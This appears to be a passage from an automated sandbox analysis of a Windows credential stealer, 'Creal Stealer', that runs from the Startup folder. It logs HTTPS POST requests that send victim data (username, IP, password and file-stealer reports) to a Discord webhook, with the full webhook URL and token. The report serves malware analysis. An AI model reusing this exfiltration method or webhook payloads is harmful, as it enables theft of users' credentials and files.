                                                                                                                                                                                                                                                                                                2024-09-27 16:19:07 UTC431OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 5a 69 70 73 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 5c 6e 5c 6e 22 2c 20 22 63 6f 6c 6f 72 22 3a 20 32 38 39 35 36 36 37 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 20 7c 20 68 74 74 70 73 3a 2f 2f 74 2e 6d 65 2f 43 72 65 61 6c 53 74 65 61 6c 65 72 22 2c 20 22 69 63 6f 6e 5f 75 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 41
                                                                                                                                                                                                                                                                                                Data Ascii: {"content": ":flag_us: - `user | 8.46.123.33 (United States)`", "embeds": [{"title": "Creal Zips", "description": "\n\n", "color": 2895667, "footer": {"text": "Creal Stealer | https://t.me/CrealStealer", "icon_url": "https://raw.githubusercontent.com/A
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:07 UTC1337INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                Date: Fri, 27 Sep 2024 16:19:07 GMT
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                Content-Length: 45
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                set-cookie: __dcfduid=387716e47cec11efa24492cc3f667719; Expires=Wed, 26-Sep-2029 16:19:07 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                                                                                x-ratelimit-limit: 5
                                                                                                                                                                                                                                                                                                x-ratelimit-remaining: 2
                                                                                                                                                                                                                                                                                                x-ratelimit-reset: 1727453949
                                                                                                                                                                                                                                                                                                x-ratelimit-reset-after: 2
                                                                                                                                                                                                                                                                                                via: 1.1 google
                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o2Sqp9Egez%2F%2Fo5xYNm9bkyplS2mGoLogezTeOyzXaqqYr6B1AotK9LqCILgFyM6Eb5U2Mf1xqeF3iOG2rZtcxE%2BsH3O3I8g7TuEQV%2FevMyIJerg1vpr4xTTehySH"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                                                                                Set-Cookie: __sdcfduid=387716e47cec11efa24492cc3f66771902cb7f58775a7929388c906eed3f87ea1e1c590be7e2057e04de1d46fa5ef857; Expires=Wed, 26-Sep-2029 16:19:07 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                Set-Cookie: __cfruid=c0a44cf1d4ebb578a3030e3a2bd1124066d8920e-1727453947; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:07 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 77 55 56 2e 6b 6d 54 54 66 59 73 4f 7a 76 6e 74 46 5f 67 49 41 64 6a 4d 41 6b 47 6e 6d 78 69 6a 66 64 78 72 49 63 30 50 57 4b 77 2d 31 37 32 37 34 35 33 39 34 37 33 33 37 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 34 32 37 64 65 31 34 33 39 37 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: Set-Cookie: _cfuvid=wUV.kmTTfYsOzvntF_gIAdjMAkGnmxijfdxrIc0PWKw-1727453947337-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd0427de14397-EWR
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:07 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                                                                                                                                                                                                                                Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                45192.168.2.849758162.159.136.2324434040C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:07 UTC332OUTPOST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Content-Length: 506
                                                                                                                                                                                                                                                                                                Host: discord.com
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:07 UTC506OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 63 6f 6c 6f 72 22 3a 20 32 38 39 35 36 36 37 2c 20 22 66 69 65 6c 64 73 22 3a 20 5b 7b 22 6e 61 6d 65 22 3a 20 22 49 6e 74 65 72 65 73 74 69 6e 67 20 66 69 6c 65 73 20 66 6f 75 6e 64 20 6f 6e 20 75 73 65 72 20 50 43 3a 22 2c 20 22 76 61 6c 75 65 22 3a 20 22 5c 6e 22 7d 5d 2c 20 22 61 75 74 68 6f 72 22 3a 20 7b 22 6e 61 6d 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 46 69 6c 65 20 53 74 65 61 6c 65 72 22 7d 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 20 7c 20 68 74
                                                                                                                                                                                                                                                                                                Data Ascii: {"content": ":flag_us: - `user | 8.46.123.33 (United States)`", "embeds": [{"color": 2895667, "fields": [{"name": "Interesting files found on user PC:", "value": "\n"}], "author": {"name": "Creal | File Stealer"}, "footer": {"text": "Creal Stealer | ht
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:07 UTC1333INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                Date: Fri, 27 Sep 2024 16:19:07 GMT
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                Content-Length: 45
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                set-cookie: __dcfduid=387de5787cec11efa7fd768b656d6a57; Expires=Wed, 26-Sep-2029 16:19:07 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                                                                                x-ratelimit-limit: 5
                                                                                                                                                                                                                                                                                                x-ratelimit-remaining: 1
                                                                                                                                                                                                                                                                                                x-ratelimit-reset: 1727453949
                                                                                                                                                                                                                                                                                                x-ratelimit-reset-after: 2
                                                                                                                                                                                                                                                                                                via: 1.1 google
                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OAyEF1TnZYJlf10iIEZWrrEkISAatWyy0AtnYkkoLN%2FK0eAGpQug%2Buvz3hDMBb1ODtwRKF1bpauqz40RVT2maZLwCL4CRYbyEqFznQfIH9j3YuS3D1azwPp7Fme3"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                                                                                Set-Cookie: __sdcfduid=387de5787cec11efa7fd768b656d6a576e74e38d9f01eabb85bb086eb923249a6a8921914e2be0f9f75ca31e9d4dfefb; Expires=Wed, 26-Sep-2029 16:19:07 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                Set-Cookie: __cfruid=c0a44cf1d4ebb578a3030e3a2bd1124066d8920e-1727453947; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:07 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 73 34 54 78 4b 64 55 64 35 72 33 68 55 37 79 47 77 2e 30 35 7a 41 48 62 43 74 4c 59 6f 66 59 47 61 56 5a 43 42 65 4a 50 52 6d 6f 2d 31 37 32 37 34 35 33 39 34 37 33 38 30 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 34 32 38 61 37 66 63 33 33 32 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: Set-Cookie: _cfuvid=s4TxKdUd5r3hU7yGw.05zAHbCtLYofYGaVZCBeJPRmo-1727453947380-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd0428a7fc332-EWR
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:07 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                                                                                                                                                                                                                                Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                46192.168.2.849760162.159.136.2324435340C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:07 UTC332OUTPOST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Content-Length: 649
                                                                                                                                                                                                                                                                                                Host: discord.com
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:07 UTC649OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 50 61 73 73 77 6f 72 64 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 3c 3a 61 70 6f 6c 6c 6f 6e 64 65 6c 69 72 6d 69 73 3a 31 30 31 32 33 37 30 31 38 30 38 34 35 38 38 33 34 39 33 3e 3a 20 2a 2a 41 63 63 6f 75 6e 74 73 2a 2a 3a 5c 6e 5c 6e 5c 6e 2a 2a 44 61 74 61 3a 2a 2a 5c 6e 3c 61 3a 68 69 72 61 5f 6b 61 73 61 61 6e 61 68 74 61 72 69 3a 38 38 36 39 34 32 38 35 36 39 36 39 38 37 35 34 37 36 3e 20 5c 75 32 30 32 32 20 2a 2a 30 2a 2a
                                                                                                                                                                                                                                                                                                Data Ascii: {"content": ":flag_us: - `user | 8.46.123.33 (United States)`", "embeds": [{"title": "Creal | Password Stealer", "description": "<:apollondelirmis:1012370180845883493>: **Accounts**:\n\n\n**Data:**\n<a:hira_kasaanahtari:886942856969875476> \u2022 **0**
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:07 UTC1339INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                Date: Fri, 27 Sep 2024 16:19:07 GMT
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                Content-Length: 45
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                set-cookie: __dcfduid=38981fec7cec11ef80f2469f692a6ab3; Expires=Wed, 26-Sep-2029 16:19:07 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                                                                                x-ratelimit-limit: 5
                                                                                                                                                                                                                                                                                                x-ratelimit-remaining: 0
                                                                                                                                                                                                                                                                                                x-ratelimit-reset: 1727453950
                                                                                                                                                                                                                                                                                                x-ratelimit-reset-after: 2
                                                                                                                                                                                                                                                                                                via: 1.1 google
                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u4Bek5%2Beth%2FT5N%2F3HReY%2F6GOrUEcz2Iq44Nal6RNGuRKOkV8PP96g7a56e3x3b2njvyI0aPbOXV5XiIc0Vu9UL1JdRtUWc42MJnW5raPso6oWyryoA3RRE%2BaxnYf"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                                                                                Set-Cookie: __sdcfduid=38981fec7cec11ef80f2469f692a6ab36bd029b63b86c8f13de41a76ac6bc55389476b40226a3f1d3a3fa2524e5821f8; Expires=Wed, 26-Sep-2029 16:19:07 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                Set-Cookie: __cfruid=c0a44cf1d4ebb578a3030e3a2bd1124066d8920e-1727453947; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:07 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 51 47 33 4c 76 32 37 43 50 4d 61 4e 77 47 57 2e 68 55 69 37 50 75 61 2e 51 68 63 6c 41 58 6f 6f 68 52 73 41 67 30 79 41 73 4e 38 2d 31 37 32 37 34 35 33 39 34 37 35 35 36 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 34 33 64 62 35 30 34 33 34 33 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: Set-Cookie: _cfuvid=QG3Lv27CPMaNwGW.hUi7Pua.QhclAXoohRsAg0yAsN8-1727453947556-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd043db504343-EWR
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:07 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                                                                                                                                                                                                                                Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                47192.168.2.849761162.159.136.2324435340C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:07 UTC332OUTPOST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Content-Length: 431
                                                                                                                                                                                                                                                                                                Host: discord.com
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:07 UTC431OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 5a 69 70 73 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 5c 6e 5c 6e 22 2c 20 22 63 6f 6c 6f 72 22 3a 20 32 38 39 35 36 36 37 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 20 7c 20 68 74 74 70 73 3a 2f 2f 74 2e 6d 65 2f 43 72 65 61 6c 53 74 65 61 6c 65 72 22 2c 20 22 69 63 6f 6e 5f 75 72 6c 22 3a 20 22 68 74 74 70 73 3a 2f 2f 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 41
                                                                                                                                                                                                                                                                                                Data Ascii: {"content": ":flag_us: - `user | 8.46.123.33 (United States)`", "embeds": [{"title": "Creal Zips", "description": "\n\n", "color": 2895667, "footer": {"text": "Creal Stealer | https://t.me/CrealStealer", "icon_url": "https://raw.githubusercontent.com/A
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:08 UTC1333INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                Date: Fri, 27 Sep 2024 16:19:08 GMT
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                Content-Length: 45
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                set-cookie: __dcfduid=38e3c7307cec11ef97003ec234dfa563; Expires=Wed, 26-Sep-2029 16:19:08 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                                                                                x-ratelimit-limit: 5
                                                                                                                                                                                                                                                                                                x-ratelimit-remaining: 0
                                                                                                                                                                                                                                                                                                x-ratelimit-reset: 1727453950
                                                                                                                                                                                                                                                                                                x-ratelimit-reset-after: 2
                                                                                                                                                                                                                                                                                                via: 1.1 google
                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kCoHAj4r8G6KMIRg74eJaM76feI23vzOfSCCh713JKhj4L3QmWiAkjmFUnAGcHkHjPFGmIWZiECX131fDyykiCv38YUxLC2GBN7QTFGPV%2Bf%2BJ2pSzkf4NTXJ1pj2"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                                                                                Set-Cookie: __sdcfduid=38e3c7307cec11ef97003ec234dfa5632e6efa5728204c9d829a6caae7b0647161891c01be7d76d605dac8b76e61473f; Expires=Wed, 26-Sep-2029 16:19:08 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                Set-Cookie: __cfruid=e61c2e80841d69c8d2221fd32020837f94fe0ef7-1727453948; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:08 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 76 49 36 65 45 61 33 46 73 4f 34 32 31 4b 30 43 55 55 69 49 43 69 4b 51 37 2e 78 72 50 31 65 54 76 42 52 6f 6e 65 6e 31 59 53 51 2d 31 37 32 37 34 35 33 39 34 38 30 34 39 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 34 36 64 64 38 37 37 32 37 31 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: Set-Cookie: _cfuvid=vI6eEa3FsO421K0CUUiICiKQ7.xrP1eTvBRonen1YSQ-1727453948049-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd046dd877271-EWR
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:08 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                                                                                                                                                                                                                                Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                48192.168.2.849762162.159.136.2324434040C:\Users\user\Desktop\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:07 UTC332OUTPOST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Content-Length: 506
                                                                                                                                                                                                                                                                                                Host: discord.com
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:07 UTC506OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 63 6f 6c 6f 72 22 3a 20 32 38 39 35 36 36 37 2c 20 22 66 69 65 6c 64 73 22 3a 20 5b 7b 22 6e 61 6d 65 22 3a 20 22 49 6e 74 65 72 65 73 74 69 6e 67 20 66 69 6c 65 73 20 66 6f 75 6e 64 20 6f 6e 20 75 73 65 72 20 50 43 3a 22 2c 20 22 76 61 6c 75 65 22 3a 20 22 5c 6e 22 7d 5d 2c 20 22 61 75 74 68 6f 72 22 3a 20 7b 22 6e 61 6d 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 46 69 6c 65 20 53 74 65 61 6c 65 72 22 7d 2c 20 22 66 6f 6f 74 65 72 22 3a 20 7b 22 74 65 78 74 22 3a 20 22 43 72 65 61 6c 20 53 74 65 61 6c 65 72 20 7c 20 68 74
                                                                                                                                                                                                                                                                                                Data Ascii: {"content": ":flag_us: - `user | 8.46.123.33 (United States)`", "embeds": [{"color": 2895667, "fields": [{"name": "Interesting files found on user PC:", "value": "\n"}], "author": {"name": "Creal | File Stealer"}, "footer": {"text": "Creal Stealer | ht
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:08 UTC1251INHTTP/1.1 429 Too Many Requests
                                                                                                                                                                                                                                                                                                Date: Fri, 27 Sep 2024 16:19:08 GMT
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                Content-Length: 79
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                retry-after: 1679
                                                                                                                                                                                                                                                                                                x-ratelimit-scope: user
                                                                                                                                                                                                                                                                                                set-cookie: __dcfduid=38e46f0a7cec11efa7c9a6a6d338c935; Expires=Wed, 26-Sep-2029 16:19:08 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                                                                                x-ratelimit-limit: 5
                                                                                                                                                                                                                                                                                                x-ratelimit-remaining: 0
                                                                                                                                                                                                                                                                                                x-ratelimit-reset: 1727453950
                                                                                                                                                                                                                                                                                                x-ratelimit-reset-after: 2
                                                                                                                                                                                                                                                                                                via: 1.1 google
                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ckv%2BFC3toF6gD3Mu6UeiYUBUM8klcCDgvQ1X52JClerSN6OGE1XOcD%2FsvU4H8ObtpwYmgqxG6z8EnVOpxLqlMEnQUqRXfoCZ34NzR5u4VeSLw3iTtM%2FYjRbCuML4"}],"group":"cf-nel","max_age":604800}
